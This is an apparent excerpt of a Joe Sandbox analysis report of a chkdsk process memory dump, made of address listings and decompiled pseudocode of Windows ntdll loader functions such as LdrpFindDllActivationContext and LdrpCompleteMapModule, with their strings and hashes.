                                                      0x00000000
                                                      0x04d9401e
                                                      0x04d93fb6
                                                      0x04d93eb1
                                                      0x04d93eb4
                                                      0x04d93eb7
                                                      0x04d93ebc
                                                      0x04de82a9
                                                      0x04de82ab
                                                      0x04d93ec2
                                                      0x04d93ed3
                                                      0x04d93ed5
                                                      0x04d93ed8
                                                      0x04d93ed8
                                                      0x04d93edd
                                                      0x04de82b3
                                                      0x04de82b6
                                                      0x00000000
                                                      0x04d93ee3
                                                      0x04d93ee8
                                                      0x04d93eed
                                                      0x04d93ef0
                                                      0x04d93ef3
                                                      0x04d93f02
                                                      0x04d93f05
                                                      0x04d93f08
                                                      0x04de82c0
                                                      0x04de82c3
                                                      0x04de82c5
                                                      0x04de82c8
                                                      0x04de82d0
                                                      0x04de82e4
                                                      0x04de82e6
                                                      0x04de82e6
                                                      0x04de82ed
                                                      0x04de82f4
                                                      0x04de82f7
                                                      0x04de82f8
                                                      0x04de82fc
                                                      0x04de82ff
                                                      0x04de82ff
                                                      0x04d93f0e
                                                      0x04d93f11
                                                      0x04d93f16
                                                      0x04d93f1d
                                                      0x04d93f31
                                                      0x04de8307
                                                      0x04de8307
                                                      0x04d93f31
                                                      0x04d93f39
                                                      0x04d93f48
                                                      0x04d93f4d
                                                      0x04d93f50
                                                      0x04d93f50
                                                      0x04d93f53
                                                      0x04d93f58
                                                      0x04d93f65
                                                      0x04d93f65
                                                      0x04d93f6a
                                                      0x00000000
                                                      0x04d93f6a
                                                      0x04d93edd
                                                      0x04d93dda
                                                      0x04d93ddd
                                                      0x04d93de0
                                                      0x04d93de5
                                                      0x04de8245
                                                      0x04d93deb
                                                      0x04d93df7
                                                      0x04d93dfc
                                                      0x04d93dfe
                                                      0x04d93e01
                                                      0x04d93e01
                                                      0x04d93e06
                                                      0x04de824d
                                                      0x04de824f
                                                      0x04de8254
                                                      0x00000000
                                                      0x04d93e0c
                                                      0x04d93e11
                                                      0x04d93e16
                                                      0x04d93e19
                                                      0x04d93e29
                                                      0x04d93e2c
                                                      0x04d93e2f
                                                      0x04de825c
                                                      0x04de825f
                                                      0x04de8261
                                                      0x04de8264
                                                      0x04de826c
                                                      0x04de8280
                                                      0x04de8282
                                                      0x04de8282
                                                      0x04de8289
                                                      0x04de8290
                                                      0x04de8293
                                                      0x04de8294
                                                      0x04de8298
                                                      0x04de829b
                                                      0x04de829b
                                                      0x04d93e35
                                                      0x04d93e38
                                                      0x04d93e3d
                                                      0x04d93e44
                                                      0x04d93e58
                                                      0x04de82a3
                                                      0x04de82a3
                                                      0x04d93e58
                                                      0x04d93e60
                                                      0x04d93e6f
                                                      0x04d93e74
                                                      0x04d93e77
                                                      0x04d93e77
                                                      0x04d93e7a
                                                      0x04d93e7f
                                                      0x04d93e8c
                                                      0x04d93e8c
                                                      0x04d93e91
                                                      0x00000000
                                                      0x04d93e91

                                                      Strings
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 04D93E97
                                                      • Kernel-MUI-Language-SKU, xrefs: 04D93F70
                                                      • Kernel-MUI-Number-Allowed, xrefs: 04D93D8C
                                                      • WindowsExcludedProcs, xrefs: 04D93D6F
                                                      • Kernel-MUI-Language-Allowed, xrefs: 04D93DC0
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      • API String ID: 0-258546922
                                                      • Opcode ID: 02270c130f705fc3f50499a85e858fb5ec1cee30779fe5bfaf646ea553ceb751
                                                      • Instruction ID: 584e1dccdc2d79e52bf4f1e0d4a4de65f0dbe00f168c1892ee5365459e547bd8
                                                      • Opcode Fuzzy Hash: 02270c130f705fc3f50499a85e858fb5ec1cee30779fe5bfaf646ea553ceb751
                                                      • Instruction Fuzzy Hash: 22F12B72E00619EBDF11EF99C980AEEB7F9FF08654F14415AE905E7211E734AE01DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DB8E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 44%
                                                      			E04DB8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x4e7d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x4e78464; // 0x74e10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x4e75780 & 0x00000003) != 0) {
							E04E05510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x4e75780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E04DCB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x4e77984; // 0x302ac8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x4e78464; // 0x74e10110
					 *0x4e7b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E04DB9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x4e75780 & 0x00000005) != 0) {
						_push(_t49);
						E04E05510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                      0x04db8e0f
                                                      0x04db8e16
                                                      0x04db8e19
                                                      0x04db8e1b
                                                      0x04db8e21
                                                      0x04db8e7f
                                                      0x04db8e85
                                                      0x04df9354
                                                      0x04df936c
                                                      0x04df9371
                                                      0x04df937b
                                                      0x04df9381
                                                      0x04df9381
                                                      0x04df937b
                                                      0x04db8e9d
                                                      0x04db8e9d
                                                      0x04db8e29
                                                      0x04db8e2c
                                                      0x04db8e38
                                                      0x04db8e3e
                                                      0x04db8e43
                                                      0x04db8eb5
                                                      0x04db8eb9
                                                      0x04df92aa
                                                      0x04df92af
                                                      0x04df92e8
                                                      0x04df92e8
                                                      0x04df92af
                                                      0x04db8eb9
                                                      0x04db8e45
                                                      0x04db8e53
                                                      0x04db8e5b
                                                      0x04db8e5f
                                                      0x04db8e78
                                                      0x04db8e78
                                                      0x04db8e7d
                                                      0x04db8ec3
                                                      0x04db8ecd
                                                      0x04db8ed2
                                                      0x04db8ed2
                                                      0x04db8ec5
                                                      0x04db8ec5
                                                      0x00000000
                                                      0x04db8e7d
                                                      0x04db8e67
                                                      0x04db8ea4
                                                      0x04df931a
                                                      0x00000000
                                                      0x00000000
                                                      0x04df9320
                                                      0x04db8ea4
                                                      0x04db8e70
                                                      0x04df9325
                                                      0x04df9340
                                                      0x04df9345
                                                      0x04df9345
                                                      0x04db8e76
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Strings
                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 04DF933B, 04DF9367
                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 04DF9357
                                                      • LdrpFindDllActivationContext, xrefs: 04DF9331, 04DF935D
                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 04DF932A
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                      • API String ID: 0-3779518884
                                                      • Opcode ID: 3469b2516bef4ee96a934c184bfa229fefab43bf41ab556cc0e71cbff61d63e8
                                                      • Instruction ID: 5842557cba6a5a466d4c24c35e315daee49715a0713903fe3f773ecba6bf3d72
                                                      • Opcode Fuzzy Hash: 3469b2516bef4ee96a934c184bfa229fefab43bf41ab556cc0e71cbff61d63e8
                                                      • Instruction Fuzzy Hash: 5441B222E00315EFDB35BB188C89BB9B3A9BB00755F0A4169F98757190E762FD80A7C1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D98794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 83%
                                                      			E04D98794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E04D9934A() != 0) {
								_t159 = E04E0A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x4e75780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E04E05510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x4e75780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E04D9849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E04D98999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E04D98999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x4e75c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x4e75c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E04DA2280(_t92, 0x4e786cc);
															_t94 = E04E59DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E04DB61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x4e75c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E04D98A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x4e75c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x4e75c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E04DCF380(_t136, 0x4d61184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E04DA2280(_t108, 0x4e786cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E04DB61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E04E59D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E04D9FFB0(_t118, _t156, 0x4e786cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E04DC9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                      0x04d98799
                                                      0x04d9879d
                                                      0x04d987a1
                                                      0x04d987a3
                                                      0x04d987a8
                                                      0x04d987c3
                                                      0x04d987c3
                                                      0x04d987c8
                                                      0x04d987d1
                                                      0x04d987d4
                                                      0x04d987d8
                                                      0x04d987e5
                                                      0x04d987ec
                                                      0x04de9bfe
                                                      0x04de9c00
                                                      0x04de9c02
                                                      0x04de9c08
                                                      0x04de9c0d
                                                      0x04de9c0f
                                                      0x04de9c14
                                                      0x04de9c2d
                                                      0x04de9c32
                                                      0x04de9c37
                                                      0x04de9c3a
                                                      0x04de9c3c
                                                      0x04de9c42
                                                      0x04de9c42
                                                      0x04de9c3c
                                                      0x04de9c02
                                                      0x04d987da
                                                      0x04d987df
                                                      0x04d987e3
                                                      0x00000000
                                                      0x00000000
                                                      0x04d987e3
                                                      0x04d987f2
                                                      0x00000000
                                                      0x04d987fb
                                                      0x04d987fd
                                                      0x04d987fe
                                                      0x04d9880e
                                                      0x04d9880f
                                                      0x04d98810
                                                      0x04d98814
                                                      0x04d9881a
                                                      0x04d9881c
                                                      0x04d9881f
                                                      0x04d98821
                                                      0x04d98822
                                                      0x04d98824
                                                      0x04d98826
                                                      0x04d9882c
                                                      0x04d9882e
                                                      0x04de9c48
                                                      0x04de9c48
                                                      0x04d98834
                                                      0x04d98834
                                                      0x04d98837
                                                      0x00000000
                                                      0x00000000
                                                      0x04d98837
                                                      0x04d9882e
                                                      0x04d9883d
                                                      0x04d98840
                                                      0x04d98843
                                                      0x04d98846
                                                      0x04d98849
                                                      0x04d9884c
                                                      0x04d9884e
                                                      0x04d98850
                                                      0x04d98852
                                                      0x04d98854
                                                      0x04d98857
                                                      0x04d988b4
                                                      0x04d988b6
                                                      0x04d988b6
                                                      0x04d98859
                                                      0x04d98859
                                                      0x04d98859
                                                      0x04d98861
                                                      0x04d98866
                                                      0x04d9886a
                                                      0x04d9893d
                                                      0x04d98941
                                                      0x00000000
                                                      0x04d98947
                                                      0x04d98947
                                                      0x04d9894a
                                                      0x04d9894c
                                                      0x00000000
                                                      0x04d98952
                                                      0x04d98955
                                                      0x04d9895a
                                                      0x04d9895d
                                                      0x04d9895d
                                                      0x04d9895f
                                                      0x04d98961
                                                      0x04d98961
                                                      0x04d98968
                                                      0x00000000
                                                      0x00000000
                                                      0x04d9896a
                                                      0x04d9896b
                                                      0x04d9896e
                                                      0x00000000
                                                      0x04d98970
                                                      0x04d98970
                                                      0x04d98970
                                                      0x04d98970
                                                      0x04d98972
                                                      0x04d98972
                                                      0x04d98974
                                                      0x00000000
                                                      0x04d9897a
                                                      0x04d9897a
                                                      0x04d9897d
                                                      0x00000000
                                                      0x04d98983
                                                      0x04de9c65
                                                      0x04de9c6d
                                                      0x04de9c72
                                                      0x04de9c75
                                                      0x04de9c75
                                                      0x04de9c82
                                                      0x04de9c86
                                                      0x04de9c87
                                                      0x04de9c88
                                                      0x04de9c89
                                                      0x04de9c8c
                                                      0x04de9c90
                                                      0x04de9c95
                                                      0x04de9c97
                                                      0x04de9ca0
                                                      0x04de9ca3
                                                      0x04de9ca9
                                                      0x04de9ca9
                                                      0x00000000
                                                      0x04de9ca9
                                                      0x04de9ca3
                                                      0x00000000
                                                      0x04de9c97
                                                      0x04d9897d
                                                      0x00000000
                                                      0x04d98974
                                                      0x04d98988
                                                      0x04d98992
                                                      0x04d98996
                                                      0x00000000
                                                      0x04d98996
                                                      0x04d9894c
                                                      0x00000000
                                                      0x04d98870
                                                      0x04d9887b
                                                      0x04d9887d
                                                      0x04d9887f
                                                      0x04d98881
                                                      0x04d98884
                                                      0x04d98884
                                                      0x04d98886
                                                      0x04d98889
                                                      0x04d9888c
                                                      0x04d9888e
                                                      0x04d98891
                                                      0x04d98891
                                                      0x04d98898
                                                      0x00000000
                                                      0x00000000
                                                      0x04d9889a
                                                      0x04d9889b
                                                      0x04d9889e
                                                      0x00000000
                                                      0x00000000
                                                      0x04d988a0
                                                      0x04d988a8
                                                      0x04d988b0
                                                      0x04d988b2
                                                      0x04d988d3
                                                      0x04d988d5
                                                      0x00000000
                                                      0x04d988d7
                                                      0x04d988db
                                                      0x04d988dc
                                                      0x04d988e0
                                                      0x04d988e8
                                                      0x04d988ee
                                                      0x04d988f0
                                                      0x04d988f3
                                                      0x04d988fc
                                                      0x04d98901
                                                      0x04d98906
                                                      0x04d9890c
                                                      0x04d9890c
                                                      0x04d9890f
                                                      0x04d98916
                                                      0x04d98917
                                                      0x04d98918
                                                      0x04d98919
                                                      0x04d9891a
                                                      0x04d9891f
                                                      0x04d98921
                                                      0x04de9c52
                                                      0x04de9c55
                                                      0x04de9c5b
                                                      0x04de9cac
                                                      0x04de9cc0
                                                      0x04de9cc0
                                                      0x04de9c55
                                                      0x04d98927
                                                      0x04d98927
                                                      0x04d9892f
                                                      0x04d98933
                                                      0x00000000
                                                      0x04d988f5
                                                      0x04d988f5
                                                      0x00000000
                                                      0x04d988f7
                                                      0x04d988f7
                                                      0x04d988fa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04d988fa
                                                      0x04d988f5
                                                      0x04d988f3
                                                      0x00000000
                                                      0x04d988d5
                                                      0x00000000
                                                      0x04d988b2
                                                      0x04d988c9
                                                      0x00000000
                                                      0x04d988c9
                                                      0x04d9887f
                                                      0x04d9886a
                                                      0x04d98857
                                                      0x04d98852
                                                      0x04d988bf
                                                      0x04d988bf
                                                      0x04d987aa
                                                      0x04d987ad
                                                      0x04d987ae
                                                      0x04d987b4
                                                      0x04d987b5
                                                      0x04d987b6
                                                      0x04d987b8
                                                      0x04d987bd
                                                      0x04d987c1
                                                      0x04d987f4
                                                      0x04d987fa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04d987c1
                                                      0x00000000

                                                      Strings
                                                      • LdrpDoPostSnapWork, xrefs: 04DE9C1E
                                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04DE9C18
                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 04DE9C28
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                      • API String ID: 0-1948996284
                                                      • Opcode ID: c953ae4e06d01cdb39c470ddd2d59a0510c4fd4f06c2959a8a24603d5ec2bd02
                                                      • Instruction ID: ba36d23645c908bd37a91a29452bdba97e958a139caefbb08a67acea057854eb
                                                      • Opcode Fuzzy Hash: c953ae4e06d01cdb39c470ddd2d59a0510c4fd4f06c2959a8a24603d5ec2bd02
                                                      • Instruction Fuzzy Hash: 6A91C071B10206ABDF18EF5AD480ABAB7F5FF46B54B4440A9E845EB240E730FD41DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D97E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 98%
                                                      			E04D97E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E04D9CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E04D8C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x4e75780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E04E05510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x4e75780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E04DA7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04DA7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E04E07016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E04DA7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04DA7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E04E07016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E04DBA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E04D8B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                      0x04d97e4c
                                                      0x04d97e50
                                                      0x04d97e55
                                                      0x04d97e58
